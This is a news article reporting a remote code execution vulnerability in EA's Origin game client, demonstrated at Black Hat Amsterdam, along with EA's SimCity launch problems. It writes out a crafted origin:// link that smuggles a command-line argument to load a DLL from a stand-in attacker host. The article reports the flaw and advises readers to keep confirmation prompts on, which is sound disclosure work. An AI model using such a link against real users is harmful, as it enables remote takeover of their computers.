A vulnerability has been discovered in Electronic Art’s Origin game distribution service that allows attackers to remotely execute malicious code on players’ computers. Demonstrated at the Black Hat security conference in Amsterdam, the hijacking vulnerability of the game takes just a few seconds to execute and takes the gamer’s PC under control. It works by manipulating the uniform resource identifiers EA’s site uses to automatically start games on an end user’s machine, without any interaction by the victim.
“The Origin platform allows malicious users to exploit local vulnerabilities or features by abusing the Origin URI handling mechanism. In other words, an attacker can craft a malicious Internet link to execute malicious code remotely on [a] victim’s system, which has Origin installed,” wrote Malta-based ReVuln researchers Donato Ferrante and Luigi Auriemma in a paper accompanying last week’s demonstration.
How This Happens?
EA platform uses the origin://LaunchGame/71503 link to activate the game.
When a targeted user instead clicks on a URI such as origin://LaunchGame/71503?CommandParams= -openautomate \\ATTACKER_IP\evil.dll, the Origin client will load a Windows dynamic link library file of the attackers’ choosing on the victim’s computer.
When an origin:// link is opened for the first time, browsers will typically ask if a user wants it to open in the Origin client, which is the registered application for such URLs. Some confirmation prompts give users the option of using the Origin client to open all origin:// links encountered in the future. Many gamers choose this setting so they aren’t prompted in the future. Those users who have selected this setting may not be required to take any interaction to be attacked. Users who want to protect themselves should make sure they are prompted before Origin links are processed.
This vulnerability has done nothing but added to EA’s woes as it has already been suffering under with the launch of SimCity Online, the much awaited city building and urban planning simulation video game, recently launched and also faced several issues. Most users, while trying to play the game, received a message saying, “SimCity Servers are down. Attempting to reconnect” at the top-left corner of their screens.
The gaming company even offered a free game to all the gamers who bought the game and suffered through all of the connection and disconnection problems. Though EA is doing its best efforts to save itself from the situation, let’s see how it comes through it.